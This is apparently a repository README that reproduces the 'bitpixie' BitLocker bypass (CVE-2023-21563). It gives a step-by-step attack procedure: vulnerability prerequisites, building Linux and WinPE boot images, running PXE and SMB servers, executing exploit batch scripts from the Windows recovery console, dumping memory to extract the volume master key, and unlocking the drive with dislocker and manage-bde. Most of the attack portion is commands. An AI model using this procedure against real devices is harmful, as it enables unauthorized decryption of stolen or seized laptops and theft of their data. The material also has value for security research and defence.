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The bitpixie vulnerability existed since October 2005, was discovered in August 2022 and publicly disclosed in February 2023 by Rairii after which it was assigned CVE-2023-21563.

The full attack chain was demonstrated by Thomas in his 38C3 talk which was followed up by two blog posts:

This repository reproduces the original research performed by Thomas based on his talk and blog posts. The used Linux kernel exploit (blog, PoC) for CVE-2024-1086 was written by @notselwyn.

Parallel to this work Andreas Grasser also attempted to reproduce the original research, ending up with a very similar approach.

Beyond simply reproducing the original research this repository also contributes an alternative WinPE-based exploitation path which might also work if Microsoft's 3rd-party Secure Boot certificate is disabled.


BitLocker must be configured without pre-boot authentication also sometimes referred to as unattended/transparent mode i.e. without a PIN or a key file.

Booting in PXE mode must be possible. In particular, the UEFI firmware must have a working TCP/IP stack. If only the network boot option is disabled, some USB dongles might work around that limitation.

If you have access to the Windows environment, launch an elevated instance of msinfo32 the entry Automatic Device Encryption Support should read Meets prerequisites.

A TPM 2.0 is needed to support the PCR7 binding

  • In Windows open Device Manager > Security Devices and check the TPM properties
  • Check in the UEFI settings, something like: Security > Security Chip > Security Chip Selection.


Changing the TPM mode will clear the stored keys, therefore:

  1. Boot Windows, disable BitLocker: manage-bde -protectors -disable C:
  2. Boot into UEFI/BIOS, enable the TPMv2.0 security chip
  3. Boot Windows, re-enable BitLocker manage-bde -protectors -enable C:

Secure Boot needs to be enabled and used for integrity validation. The command below, must list exactly the PCRs 7, 11:

PS> manage-bde -protectors -get c:
      PCR Validation Profile:
        7, 11
        (Uses Secure Boot for integrity validation)


If the PCR register 4 is included, this attack will not work.


To make a device intentionally vulnerable a local GPO can be configured:

  1. Temporarily suspend BitLcoker protection: manage-bde -protectors -disable C:
  2. Create a GPO using gpedit.msc
  • Open Computer Configuration > Administrative Templates > Windows Components > BitLocker Drive Encryption > Operating System Drives
  • Enable Configure TPM startup PIN and PCRs and enter the PCR values: 7, 11
  1. Apply the GPO: gpupdate /force
  2. Confirm settings: gpresult /scope coputer /h gpo.html
  3. Re-enable BitLocker: manage-bde -protectors -enable c:

KB5025885 must not be installed.

Only systems using a bootloader signed with the 2011 Secure Boot certificate are vulnerable. To check this, mount the boot partition and check the signature of EFI\Microsoft\Boot\bootmgfw.efi. This can also be performed using osslsigncode.

If your target device has Microsoft's 3rd-party Secure Boot certificate disabled, only the WinPE-based exploitation strategy might work, otherwise both should be applicable.

Environment Setup

A top level Makefile prepares all needed components. Either run it for a particular exploitation strategy or prepare both scenarios:


This requires a working Docker setup. For the actual exploitation you will also need:

Linux Initramfs Generation

An initramfs containing all needed components based on a stripped down version of frood, an Alpine initramfs NAS can be generated with:

make linux

WinPE Ramdisk

Similarly, the following command will generate a bootable WinPE environment:

make winpe

SMB Server

Start a SMB server from where the attack scripts can be downloaded from and the resulting, device-specific BCD can be uploaded to. Impacket's works great for that:

cd pxe && ./

PXE Server

Start the PXE server serving the network boot images:

cd pxe && ./ eth0


Boot into Recovery Mode

Let Windows boot normally, on the logon screen hold down the Shift key and select the Restart option from the power menu.

Windows will reboot into a recovery mode. Select Troubleshoot > Advanced Option > Command Prompt. If desired, select Change keyboard layout. When prompted for BitLocker recovery key, select Skip this drive.

You should now be in a command prompt within the recovery environment.

If needed, enable network support:

wpeutil initializenetwork


You should see DHCP request served by dnsmasq.

Mount the exposed SMB share:

net use S: \\\smb

Make sure you are in local temp directory:

cd %TEMP%


Either continue with the Linux or WinPE based exploitation.

Linux-based Exploitation

Copy the attack script to the temporary directory:

copy S:\exploit-linux.bat .

Execute it to generate a modifed BCD file and upload it to the SMB share specified with the drive letter:

.\exploit-linux.bat S:


The device specific BCD file needs to be served as Boot\BCD via PXE.

Exit the command line and chose Use a device then select the option indicating PXE boot (e.g. PCI LAN).

Boot into Linux Environment

The device should now reboot over PXE, fail to fully load the Windows boot configuration then fall back to the served Linux environment.


If you end up on a blank blue screen it might help to press Escape to show the GRUB boot menu where you can select the Linux system.

This typically means something did not work as expected.

Login with the root user, no password is needed. Follow the instructions printed in the logon message. Replace XYZ with device file representing your encrypted BitLocker volume:

exploit && ./ /dev/XYZ && ls mnt

WinPE-based Exploitation

For the WinPE-based exploitation strategy, two BCD files will be needed.

copy S:\exploit-winpe1.bat .

Upload the generated BCD files to the specified share:

.\exploit-winpe1.bat S:

Exit the command line and chose Use a device then select the option indicating PXE boot (e.g. PCI LAN).

Boot into Windows Boot Manager

The device should now reboot and PXE-load the first instance of the Windows Boot Manager (bootmgfw.efi). The provided configuration deliberately points to a missing second stage boot manager (bootmgfw-stage2.efi).

You will therefore encounter an error:

  • File: \
  • Status: 0xc00000ba
  • Info: The application or operating system couldn't be loaded because a required file is missing or contains errors.

At this point you should switch out the BCD file served by dnsmasq from pxe/tftp/Boot/BCD. One way to do this is to create a symlink such that pxe/smb/BCD no longer points to BCD_winpe1, but now refers to the second stage BCD_winpe2.

ln -sf BCD_winpe2 pxe/smb/BCD

Addtionally, you will have to make sure that the second stage boot manager causing the original error can now be found.

ln -sf bootmgfw.efi pxe/tftp/bootmgfw-stage2.efi

Once these changes are in place, press Enter to view the OS Selection. Chose the option softreboot. This should now fallback to the second stage BCD which initiates the loading of WinPE from a ramdisk.


In case of an error, revert the changes, i.e. make sure BCD_winpe1 is served and the second stage boot manager is not found, then retry the procedure.

ln -sf BCD_winpe1 pxe/smb/BCD
rm pxe/tftp/bootmgfw-stage2.efi


I automated these steps using a GDB script. However, the resulting setup was somehow less reliable than performing the changes manually.

Boot into WinPE

Connect an external storage device with enough capacity to store a complete memory dump of your system. We will assume it is mounted at c:\.

Reconnect the SMB share, download the attack script and start the second part of the exploitation:

net use S: \\\smb
copy S:\exploit-winpe2.bat .
.\exploit-winpe2.bat S:


Alternatively, the necessary tooling can also be copied to the external storage. This avoids the need for a network connection and might change the internal memory layout.

This will first take a complete memory dump using DumpIt. Time will depend on the amount of memory and the speed of your external drive.

The memory dump is then searched for a volume master key (VMK). If successful, a vmk-*.dat file should now exists in the current directory.

The next step is to determine the byte offset of the encrypted partition relative to the start of the disk. This information can be queried as follows:

c:\> diskpart
diskpart> list disk
diskpart> select disk 0
diskpart> detail disk
diskpart> list partitions
diskpart> select partition 3
diskpart> detail partition
Offset in Bytes: 1234
diskpart> assign letter=B


Select the disk and partition indices corresponding to your system.

Once you have have the disk index, partion offset as well as the VMK file, you can run the following command to hopefully print the BitLocker recovery password in human readable form:

dislocker-metadata.exe -V \\.\PhysicalDrive0 -o 1234 -K vmk.dat


Capitalization of PhysicalDrive matters!

Using the recovery password the encrypted volume can be unlocked:

manage-bde -unlock B: -RecoveryPassword 123456-789012-345678-901234-567890-123456


Unfortunately, the running WinPE instance does not have a working BitLocker setup. I built my own, but then the key would no longer be in memory. Needs more investigation.

At this point I would suggest to once more boot into the native recovery environment where you should be able to unlock the disk.

Success Stories

Windows 11 devices which were successfully exploited, after manually enabling the TCP stack in the UEFI settings:

  • Lenovo ThinkPad T460s 20FAA01100
  • Lenovo ThinkPad X280 20KES6C42B